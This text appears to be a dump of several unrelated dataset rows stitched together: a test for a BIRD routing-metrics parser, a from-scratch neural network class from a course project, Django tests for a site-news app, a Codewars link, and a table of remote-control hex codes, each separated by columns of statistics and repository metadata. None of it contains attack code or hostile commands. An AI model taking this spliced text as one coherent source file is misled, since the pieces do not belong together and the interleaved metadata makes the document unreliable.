('bird_routes{bird_protocol_instance="static1",bird_route_type="exported"}', 0),
('bird_routes{bird_protocol_instance="static1",bird_route_type="preferred"}', 1),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="updates",bird_outcome="received"}', 1),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="updates",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="updates",bird_outcome="filtered"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="updates",bird_outcome="ignored"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="updates",bird_outcome="accepted"}', 1),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="withdraws",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="withdraws",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="withdraws",bird_outcome="ignored"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="withdraws",bird_outcome="accepted"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="export",bird_action="updates",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="export",bird_action="updates",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="export",bird_action="updates",bird_outcome="filtered"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="export",bird_action="updates",bird_outcome="accepted"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="export",bird_action="withdraws",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="export",bird_action="withdraws",bird_outcome="accepted"}', 0)])
def test_mesh_start(self):
"""Tests the metrics output for a mesh route that is not up yet."""
text = '''BIRD 1.5.0 ready.
Mesh_10_101_4_114 BGP master start 2016-10-23 Active Socket: Host is unreachable
Description: Connection to BGP peer
Preference: 100
Input filter: ACCEPT
Output filter: calico_pools
Routes: 0 imported, 0 exported, 0 preferred
Route change stats: received rejected filtered ignored accepted
Import updates: 0 0 0 0 0
Import withdraws: 0 0 --- 0 0
Export updates: 0 0 0 --- 0
Export withdraws: 0 --- --- --- 0
BGP state: Active
Neighbor address: 10.101.4.114
Neighbor AS: 64511
Connect delay: 3/5
Last error: Socket: Host is unreachable
'''
self.assertEqual(
list(birdwatcher.parse_show_protocols(StringIO.StringIO(text))),
[('bird_up{bird_protocol_instance="Mesh_10_101_4_114"}', 0),
('bird_preference{bird_protocol_instance="Mesh_10_101_4_114"}', 100),
('bird_routes{bird_protocol_instance="Mesh_10_101_4_114",bird_route_type="imported"}', 0),
('bird_routes{bird_protocol_instance="Mesh_10_101_4_114",bird_route_type="exported"}', 0),
('bird_routes{bird_protocol_instance="Mesh_10_101_4_114",bird_route_type="preferred"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="updates",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="updates",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="updates",bird_outcome="filtered"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="updates",bird_outcome="ignored"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="updates",bird_outcome="accepted"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="withdraws",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="withdraws",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="withdraws",bird_outcome="ignored"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="withdraws",bird_outcome="accepted"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="export",bird_action="updates",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="export",bird_action="updates",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="export",bird_action="updates",bird_outcome="filtered"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="export",bird_action="updates",bird_outcome="accepted"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="export",bird_action="withdraws",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="export",bird_action="withdraws",bird_outcome="accepted"}', 0),
('bird_bgp_state{bird_protocol_instance="Mesh_10_101_4_114",bird_bgp_state="Active"}', 1)])
def test_mesh_up(self):
"""Tests the metrics output for a mesh route that is up."""
text = '''BIRD 1.5.0 ready.
Mesh_10_101_4_182 BGP master up 2016-10-23 Established
Description: Connection to BGP peer
Preference: 100
Input filter: ACCEPT
Output filter: calico_pools
Routes: 1 imported, 1 exported, 1 preferred
Route change stats: received rejected filtered ignored accepted
Import updates: 1 0 0 0 1
Import withdraws: 0 0 --- 0 0
Export updates: 44 25 18 --- 1
Export withdraws: 0 --- --- --- 0
BGP state: Established
Neighbor address: 10.101.4.182
Neighbor AS: 64511
Neighbor ID: 10.101.4.182
Neighbor caps: refresh enhanced-refresh restart-able AS4 add-path-rx add-path-tx
Session: internal multihop AS4 add-path-rx add-path-tx
Source address: 10.101.4.148
Hold timer: 177/240
Keepalive timer: 61/80
'''
self.assertEqual(
list(birdwatcher.parse_show_protocols(StringIO.StringIO(text))),
[('bird_up{bird_protocol_instance="Mesh_10_101_4_182"}', 1),
('bird_preference{bird_protocol_instance="Mesh_10_101_4_182"}', 100),
('bird_routes{bird_protocol_instance="Mesh_10_101_4_182",bird_route_type="imported"}', 1),
('bird_routes{bird_protocol_instance="Mesh_10_101_4_182",bird_route_type="exported"}', 1),
('bird_routes{bird_protocol_instance="Mesh_10_101_4_182",bird_route_type="preferred"}', 1),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="updates",bird_outcome="received"}', 1),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="updates",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="updates",bird_outcome="filtered"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="updates",bird_outcome="ignored"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="updates",bird_outcome="accepted"}', 1),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="withdraws",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="withdraws",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="withdraws",bird_outcome="ignored"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="withdraws",bird_outcome="accepted"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="export",bird_action="updates",bird_outcome="received"}', 44),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="export",bird_action="updates",bird_outcome="rejected"}', 25),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="export",bird_action="updates",bird_outcome="filtered"}', 18),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="export",bird_action="updates",bird_outcome="accepted"}', 1),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="export",bird_action="withdraws",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="export",bird_action="withdraws",bird_outcome="accepted"}', 0),
('bird_bgp_state{bird_protocol_instance="Mesh_10_101_4_182",bird_bgp_state="Established"}', 1),
('bird_hold_timer_current{bird_protocol_instance="Mesh_10_101_4_182"}', 177),
('bird_hold_timer_initial{bird_protocol_instance="Mesh_10_101_4_182"}', 240),
('bird_keepalive_timer_current{bird_protocol_instance="Mesh_10_101_4_182"}', 61),
('bird_keepalive_timer_initial{bird_protocol_instance="Mesh_10_101_4_182"}', 80)])
if __name__ == '__main__':
unittest.main()
| 80.710526
| 155
| 0.680388
| 1,555
| 12,268
| 4.967203
| 0.096463
| 0.102538
| 0.170896
| 0.062144
| 0.889824
| 0.875712
| 0.864707
| 0.855515
| 0.853962
| 0.831046
| 0
| 0.070398
| 0.1918
| 12,268
| 151
| 156
| 81.245033
| 0.708623
| 0.025758
| 0
| 0.268657
| 0
| 0.007463
| 0.823081
| 0.610795
| 0
| 0
| 0
| 0
| 0.022388
| 1
| 0.022388
| false
| 0
| 0.313433
| 0
| 0.343284
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
0d85e247ff8e31073c630b38d5e660939f7e6bd0
| 16,135
|
py
|
Python
|
networks.py
|
raginisharma14/Deep-Learning
|
df201ff8db9f2f0f252c53f81dd4ace2a1372bd0
|
[
"MIT"
] | null | null | null |
networks.py
|
raginisharma14/Deep-Learning
|
df201ff8db9f2f0f252c53f81dd4ace2a1372bd0
|
[
"MIT"
] | null | null | null |
networks.py
|
raginisharma14/Deep-Learning
|
df201ff8db9f2f0f252c53f81dd4ace2a1372bd0
|
[
"MIT"
] | null | null | null |
"""
MIT License
Copyright (c) 2017 Ragini Sharma
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy
import math
import random
class xor_net(object):
"""
This is a sample class for miniproject 1.
Args:
data: Is a tuple, ``(x,y)``
``x`` is a two or one dimensional ndarray ordered such that axis 0 is independent
data and data is spread along axis 1. If the array had only one dimension, it implies
that data is 1D.
``y`` is a 1D ndarray it will be of the same length as axis 0 or x.
"""
"""
This method is used to build the neural network
Args:
param1: takes no of input nodes
param2: takes no of hidden nodes in hidden layer1.
param3: takes no of hidden nodes in hidden layer2.
param4: takes no of output nodes.
Returns: Built network
"""
def build_network(self, n_inputs, n_hidden1, n_hidden2, n_outputs):
network = list()
hidden_layer1 = [{'weights':[random.random() for i in range(n_inputs + 1)]} for i in range(n_hidden1)]
network.append(hidden_layer1)
hidden_layer2 = [{'weights':[random.random() for i in range(n_hidden1 + 1)]} for i in range(n_hidden2)]
network.append(hidden_layer2)
output_layer = [{'weights':[random.random() for i in range(n_hidden2 + 1)]} for i in range(n_outputs)]
network.append(output_layer)
return network
"""
This method calculates the activation of each neuron.
Args:
param1: takes the weights and inputs of each neuron in each layer of the network
Returns: activated Value.
"""
def activate(self, weights, inputs):
activation = weights[-1]
for i in range(len(weights)-1):
activation += weights[i] * inputs[i]
return activation
"""
This method is the sigmoid function
Args:
param1: takes the activation value
Returns: Sigmoid value of the activation.
"""
def sigmoid(self, activation):
return 1.0 / (1.0 + math.exp(-activation))
"""
This method is used to do the forward propogation of the neural network
Args:
param1: takes the built network
param2: takes each sample of the dataset.
Returns: Predicted Value.
"""
def forward_propagation(self,network, row):
inputs = row
for layer in network:
new_inputs = []
for node in layer:
activation = self.activate(node['weights'], inputs)
node['output'] = self.sigmoid(activation)
new_inputs.append(node['output'])
inputs = new_inputs
return inputs
def sigmoid_derivative(self,output):
return output * (1.0 - output)
"""
This method does the backpropogation. Calculate the gradients for each sample
and modify the weights.
Args:
Param1: Takes network
Param2: Takes the expected values
"""
def back_propagation(self,network, expected):
for i in reversed(range(len(network))):
layer = network[i]
errors = list()
if i != len(network)-1:
for j in range(len(layer)):
error = 0.0
for node in network[i + 1]:
error += (node['weights'][j] * node['delta'])
errors.append(error)
else:
for j in range(len(layer)):
node = layer[j]
errors.append(expected[j] - node['output'])
for j in range(len(layer)):
node = layer[j]
node['delta'] = errors[j] * self.sigmoid_derivative(node['output'])
def update_weights(self,network, row, l_rate):
for i in range(len(network)):
inputs = row[:-1]
if i != 0:
inputs = [node['output'] for node in network[i - 1]]
for node in network[i]:
for j in range(len(inputs)):
node['weights'][j] += l_rate * node['delta'] * inputs[j]
node['weights'][-1] += l_rate * node['delta']
"""
This method is used to train the neural network
Args:
param1: takes the network
param2: takes the dataset.
param3: takes the learning rate
param4: No of epochs
param5: No Of output nodes.
"""
"""
Here the neural network uses stochastic gradient descent and not batch gradient descent as we are looping through one sample at a time.
Each iteration has one sample. Loss is calculated for that particular sample, and then we are updating weights in the same iteration itself.
"""
def train_network(self,network, train, l_rate, n_epoch, n_outputs):
for epoch in range(n_epoch):
sum_error = 0
for row in train:
outputs = self.forward_propagation(network, row)
expected = [0 for i in range(n_outputs)]
expected[int(row[-1])] = 1
sum_error += sum([(expected[i]-outputs[i])**2 for i in range(len(expected))])
self.back_propagation(network, expected)
self.update_weights(network, row, l_rate)
print('epoch=%d, learningrate=%.3f, loss=%.3f' % (epoch, l_rate, sum_error))
self.network = network
def __init__(self, data, labels):
rows, columns = data.shape
labels = numpy.array([labels], dtype=int)
a = numpy.concatenate((data, labels.T), axis =1)
n_inputs = len(a[0]) - 1
n_outputs = len(set([row[-1] for row in a]))
# build network with 2 hidden layers and 10 nodes in each hidden layer
network = self.build_network(n_inputs, 10,10, n_outputs)
self.train_network(network, a, 0.5, 100, n_outputs)
for layer in network:
print(layer)
def get_params (self):
self.params = [] # [(w,b),(w,b)]
"""
Method that should return the model parameters.
self.params = [] # [(w,b),(w,b)]
Returns:
tuple of numpy.ndarray: (w, b).
Notes:
This code will return an empty list for demonstration purposes. A list of tuples of
weoghts and bias for each layer. Ordering should from input to outputt
"""
return self.params
def get_predictions (self, x):
"""
Method should return the outputs given unseen data
Args:
x: array similar to ``x`` in ``data``. Might be of different size.
Returns:
numpy.ndarray: ``y`` which is a 1D array of predictions of the same length as axis 0 of
``x``
Notes:
Temporarily returns random numpy array for demonstration purposes.
"""
# Here is where you write a code to evaluate the data and produce predictions.
a, b = x.shape
rows, columns = x.shape
labels = numpy.zeros(shape=(rows))
labels = numpy.array([labels])
a = numpy.concatenate((x, labels.T), axis =1)
rows,columns = a.shape
result = numpy.zeros(shape= rows)
i=0
for row in a:
outputs = self.forward_propagation(self.network, row)
result[i]= outputs.index(max(outputs))
i =i+1
return result
class mlnn(xor_net):
"""
Build neural network with 6 hidden layers and different nodes in each layer.
"""
def initialize_network(self, n_inputs, n_hidden1, n_hidden2, n_hidden3, n_hidden4, n_hidden5, n_hidden6, n_outputs):
network = list()
hidden_layer1 = [{'weights':[random.random() for i in range(n_inputs + 1)]} for i in range(n_hidden1)]
network.append(hidden_layer1)
hidden_layer2 = [{'weights':[random.random() for i in range(n_hidden1 + 1)]} for i in range(n_hidden2)]
network.append(hidden_layer2)
hidden_layer3 = [{'weights':[random.random() for i in range(n_hidden2 + 1)]} for i in range(n_hidden3)]
network.append(hidden_layer3)
hidden_layer4 = [{'weights':[random.random() for i in range(n_hidden3 + 1)]} for i in range(n_hidden4)]
network.append(hidden_layer4)
hidden_layer5 = [{'weights':[random.random() for i in range(n_hidden4 + 1)]} for i in range(n_hidden5)]
network.append(hidden_layer5)
hidden_layer6 = [{'weights':[random.random() for i in range(n_hidden5 + 1)]} for i in range(n_hidden6)]
network.append(hidden_layer6)
output_layer = [{'weights':[random.random() for i in range(n_hidden6 + 1)]} for i in range(n_outputs)]
network.append(output_layer)
return network
"""
This method calculates the activation of each neuron.
Args:
param1: takes the weights and inputs of each neuron in each layer of the network
Returns: activated Value.
"""
def activate(self, weights, inputs):
activation = weights[-1]
for i in range(len(weights)-1):
activation += weights[i] * inputs[i]
return activation
"""
This method is the sigmoid function
Args:
param1: takes the activation value
Returns: Sigmoid value of the activation.
"""
def sigmoid(self, activation):
return 1.0 / (1.0 + math.exp(-activation))
"""
This method is used to do the forward propogation of the neural network
Args:
param1: takes the built network
param2: takes each sample of the dataset.
Returns: Predicted Value.
"""
def forward_propagation(self,network, row):
inputs = row
for layer in network:
new_inputs = []
for node in layer:
activation = self.activate(node['weights'], inputs)
node['output'] = self.sigmoid(activation)
new_inputs.append(node['output'])
inputs = new_inputs
return inputs
def sigmoid_derivative(self,output):
return output * (1.0 - output)
"""
This method does the backpropogation. Calculate the gradients for each sample
and modify the weights.
Args:
Param1: Takes network
Param2: Takes the expected values
"""
def back_propagation(self,network, expected):
for i in reversed(range(len(network))):
layer = network[i]
errors = list()
if i != len(network)-1:
for j in range(len(layer)):
error = 0.0
for node in network[i + 1]:
error += (node['weights'][j] * node['delta'])
errors.append(error)
else:
for j in range(len(layer)):
node = layer[j]
errors.append(expected[j] - node['output'])
for j in range(len(layer)):
node = layer[j]
node['delta'] = errors[j] * self.sigmoid_derivative(node['output'])
def update_weights(self,network, row, l_rate):
for i in range(len(network)):
inputs = row[:-1]
if i != 0:
inputs = [node['output'] for node in network[i - 1]]
for node in network[i]:
for j in range(len(inputs)):
node['weights'][j] += l_rate * node['delta'] * inputs[j]
node['weights'][-1] += l_rate * node['delta']
"""
This method is used to train the neural network
Args:
param1: takes the network
param2: takes the dataset.
param3: takes the learning rate
param4: No of epochs
param5: No Of output nodes.
"""
def train_network(self,network, train, l_rate, n_epoch, n_outputs):
for epoch in range(n_epoch):
sum_error = 0
for row in train:
outputs = self.forward_propagation(network, row)
expected = [0 for i in range(n_outputs)]
expected[int(row[-1])] = 1
sum_error += sum([(expected[i]-outputs[i])**2 for i in range(len(expected))])
self.back_propagation(network, expected)
self.update_weights(network, row, l_rate)
print('epoch=%d, learningrate=%.3f, loss=%.3f' % (epoch, l_rate, sum_error))
self.network = network
def __init__(self, data, labels):
rows, columns = data.shape
print ("columns", columns)
print(data)
print(labels)
labels = numpy.array([labels], dtype=int)
a = numpy.concatenate((data, labels.T), axis =1)
n_inputs = len(a[0]) - 1
n_outputs = len(set([row[-1] for row in a]))
network = self.initialize_network(n_inputs, 20, 20, 20, 10,10,5,n_outputs)
self.train_network(network, a, 0.2, 100, n_outputs)
for layer in network:
print(layer)
def get_params (self):
self.params = [] # [(w,b),(w,b)]
"""
Method that should return the model parameters.
self.params = [] # [(w,b),(w,b)]
Returns:
tuple of numpy.ndarray: (w, b).
Notes:
This code will return an empty list for demonstration purposes. A list of tuples of
weoghts and bias for each layer. Ordering should from input to outputt
"""
return self.params
def get_predictions (self, x):
"""
Method should return the outputs given unseen data
Args:
x: array similar to ``x`` in ``data``. Might be of different size.
Returns:
numpy.ndarray: ``y`` which is a 1D array of predictions of the same length as axis 0 of
``x``
Notes:
Temporarily returns random numpy array for demonstration purposes.
"""
# Here is where you write a code to evaluate the data and produce predictions.
a, b = x.shape
rows, columns = x.shape
labels = numpy.zeros(shape=(rows))
labels = numpy.array([labels])
a = numpy.concatenate((x, labels.T), axis =1)
rows,columns = a.shape
result = numpy.zeros(shape= rows)
i=0
for row in a:
outputs = self.forward_propagation(self.network, row)
result[i]= outputs.index(max(outputs))
i =i+1
return result
if __name__ == '__main__':
pass
| 37.523256
| 142
| 0.563557
| 2,018
| 16,135
| 4.43558
| 0.147671
| 0.029717
| 0.020109
| 0.03441
| 0.786281
| 0.78427
| 0.770193
| 0.761479
| 0.743716
| 0.736007
| 0
| 0.017047
| 0.341927
| 16,135
| 429
| 143
| 37.610723
| 0.825956
| 0.01661
| 0
| 0.872549
| 0
| 0
| 0.032884
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.004902
| 0.014706
| null | null | 0.034314
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0da0056259d06504ba795b71c756cf6bc2906891
| 3,421
|
py
|
Python
|
tests/test_models.py
|
franck-6/django_site_news-1
|
8f2de354ff8fa3953110ccb6b6d5c2879b1f38fe
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
franck-6/django_site_news-1
|
8f2de354ff8fa3953110ccb6b6d5c2879b1f38fe
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
franck-6/django_site_news-1
|
8f2de354ff8fa3953110ccb6b6d5c2879b1f38fe
|
[
"MIT"
] | 2
|
2015-05-25T12:42:02.000Z
|
2018-11-26T04:42:07.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
from django.contrib.sites.models import Site
from site_news.models import NewsItem, NewsItemManager
def _get_site():
return Site.objects.get_or_create(domain='mock')[0]
class NewsItemTestCase(unittest.TestCase):
def setUp(self):
from django.core.management import call_command
call_command('loaddata', 'tests/fixtures/test_data.json', verbosity=0)
def test_get_latest(self):
"""
Get all items, ordered by dates.
"""
qs = NewsItem.objects.get_latest()
self.assertEqual(qs.count(), 12)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_with_max_items(self):
"""
Get all items, ordered by dates and trimmed to max_items.
"""
qs = NewsItem.objects.get_latest(max_items=4)
self.assertEqual(qs.count(), 4)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_by_site(self):
"""
Get all items for given site, ordered by dates.
"""
qs = NewsItem.objects.get_latest_by_site(
site=Site.objects.get(domain='buytowels.com'))
self.assertEqual(qs.count(), 6)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_by_site_with_max_items(self):
"""
Get all items for given site, ordered by dates and trimmed to max_items.
"""
qs = NewsItem.objects.get_latest_by_site(
site=Site.objects.get(domain='buytowels.com'),
max_items=3)
self.assertEqual(qs.count(), 3)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_published(self):
"""
Get published items, ordered by dates.
"""
qs = NewsItem.objects_published.get_latest()
self.assertEqual(qs.count(), 7)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_published_with_max_items(self):
"""
Get published items, ordered by dates and trimmed to max_items.
"""
qs = NewsItem.objects_published.get_latest(max_items=4)
self.assertEqual(qs.count(), 4)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_published_by_site(self):
"""
Get published items for given site, ordered by dates.
"""
qs = NewsItem.objects_published.get_latest_by_site(
site=Site.objects.get(domain='buytowels.com'))
self.assertEqual(qs.count(), 6)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_published_by_site_with_max_items(self):
"""
Get published items for given site, ordered by dates and trimmed to max_items.
"""
qs = NewsItem.objects_published.get_latest_by_site(
site=Site.objects.get(domain='buytowels.com'),
max_items=3)
self.assertEqual(qs.count(), 3)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
| 36.393617
| 90
| 0.61824
| 464
| 3,421
| 4.383621
| 0.150862
| 0.070796
| 0.12586
| 0.06293
| 0.826942
| 0.826942
| 0.80531
| 0.751229
| 0.731563
| 0.707473
| 0
| 0.018721
| 0.250512
| 3,421
| 94
| 91
| 36.393617
| 0.774571
| 0.137387
| 0
| 0.571429
| 0
| 0
| 0.034004
| 0.010603
| 0
| 0
| 0
| 0
| 0.428571
| 1
| 0.178571
| false
| 0
| 0.089286
| 0.017857
| 0.303571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0da4d23c050c9342875ef0222a02c899afacde41
| 123
|
py
|
Python
|
py/re_sub_lambda.py
|
scoraig52/code
|
c9335071266267227b56e48861a4f188d16ca4a4
|
[
"MIT"
] | 2
|
2021-02-18T04:42:40.000Z
|
2021-12-12T00:27:42.000Z
|
py/re_sub_lambda.py
|
akar-0/code
|
be15d79e7c9de107cc66cbdfcb3ae91a799607dd
|
[
"MIT"
] | null | null | null |
py/re_sub_lambda.py
|
akar-0/code
|
be15d79e7c9de107cc66cbdfcb3ae91a799607dd
|
[
"MIT"
] | 1
|
2021-11-20T10:24:09.000Z
|
2021-11-20T10:24:09.000Z
|
// https://www.codewars.com/kata/reviews/547bbf3d2d47f7a96f0001ce/groups/547bbf40ec2cf18cf60001d4#611bc5ad9119190048b04283
| 61.5
| 122
| 0.878049
| 10
| 123
| 10.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.38843
| 0.01626
| 123
| 1
| 123
| 123
| 0.504132
| 0.195122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0dd4f5b9077e8d0fdb2ba50cd30d712dce4138a7
| 1,891
|
py
|
Python
|
blackbean/commands.py
|
hine/homeserver
|
21adfbf148cb387f3ba3922515d1c01ad3e81499
|
[
"MIT"
] | 3
|
2018-03-13T06:35:19.000Z
|
2018-12-26T12:49:10.000Z
|
blackbean/commands.py
|
hine/homeserver
|
21adfbf148cb387f3ba3922515d1c01ad3e81499
|
[
"MIT"
] | null | null | null |
blackbean/commands.py
|
hine/homeserver
|
21adfbf148cb387f3ba3922515d1c01ad3e81499
|
[
"MIT"
] | null | null | null |
rf_commands = {
'light/off': '2600500000012b9312131337131312131213131213121338133713131238133713131238133713131312133714371337143713121312131214371312131214111411143713371436140005610001294813000d050000000000000000',
'aircon/off': '2600d6007f3d110e112c110f112c110e112c110f112c110e112c110f112c112c110e112c110f112c112c112c112c110e110f112c112c110e110f110e110f112c110e110e120e110e110f112c110e110f110e110e110f112c110e110f110e110f112b120e110e112c110f110e110f110e112c110f110e110e110f110e110f110e110e110f110e112c102d112c112c120e110e110f110e110f100f110e110f110e112c1010112c110e110f100f110e110f110e110f100f110e110f112c100f110f102d0f2e0f2e112c100f110f110e112c112c112c110f0e000d050000',
'tv/power': '2600500000012695121311141113131212131213123811141138123812381238113911381213123812131238111411131238121312131213113911131238123812131238113812381200051a0001264b13000d050000000000000000',
'tv/input': '260050000001289214111411141114111411131213361411143614361336143614361436141113361436143614361436131114111411141114111312131114111436143613361436140005170001284914000d050000000000000000',
'tv/ch_up': '260050000001289314111410141114111411141114361410143614361436143514361436141114361435143614111436143614111311141114111411143614101411143614361436140005170001284914000d050000000000000000',
'tv/ch_down': '260050000001279314111411141114111311141114361411143515351436143614361435151014361436143614351436143614111411141114101411141114111411143317351436140005170001284914000d050000000000000000',
'tv/vol_up': '260050000001289214111411141114111411141015351411143614361435153514361436141114351510143614111436143515101411141114361411143514111411143614361435140005180001284616000d050000000000000000',
'tv/vol_down': '260050000001289314111411141015101411141114361411143514361436143614351535141114361411143515351436143614111410151014361411141114101510143614361436140005170001284914000d050000000000000000',
}
| 171.909091
| 458
| 0.953993
| 30
| 1,891
| 59.966667
| 0.666667
| 0.004447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.863124
| 0.014807
| 1,891
| 10
| 459
| 189.1
| 0.102523
| 0
| 0
| 0
| 0
| 0
| 0.952406
| 0.913802
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.